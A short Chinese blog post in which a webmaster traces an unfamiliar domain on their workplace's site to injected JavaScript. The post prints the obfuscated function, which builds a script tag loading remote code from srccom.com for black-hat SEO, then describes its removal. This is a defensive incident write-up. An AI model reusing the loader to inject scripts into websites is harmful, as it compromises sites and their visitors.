晚上无聊，点到自家单位的网站，等待加载的时候发现一个没见过的域名【srccom.com】，印象中自己好像没有加过类似的代码，于是开始倒查，发现调用的代码来自这个JS（由于问题已经处理，所以文件已经变成404）：

文件内容如下：

function CurrentXmlFrmFocus()
{
 	var arnElement=[2,9,3,8,2,8,7,5,4,3,10,5];
 	var arsOffset=[" ",":",".","/","<",">","=","'","SRC","COM","SCRIPT","HTTP"];
 	var ardPopOpacity=[4,10,0,8,6,7,11,1,3,3,8,9];
 	var strgAttribute="";ardPopOpacity=ardPopOpacity.concat(arnElement);
 	for(var i=0;i<ardPopOpacity.length;i++)strgAttribute=strgAttribute+arsOffset[ardPopOpacity[i]];document.writeln(strgAttribute);
}
CurrentXmlFrmFocus();

绕了个弯子，稍微分析一下的话，是向当前页写入以下一行代码：

<script src=”http://srccom.com/src.src” />

于是反向访问过去，冒出一大堆代码：

由于之前也被别人写入过SEO的代码，猜测可能是一样的东西，所以没有细看，选了一个关键字在网上搜了一下，果然是做黑帽SEO的淘宝客（介绍文章在这里）。

删掉对应页面中的调用代码，然后立即回到服务器上看修改时间，发现是去年11月写入的，想起那次所在的主机被人给旁注了，应该不是自己的问题，松口气。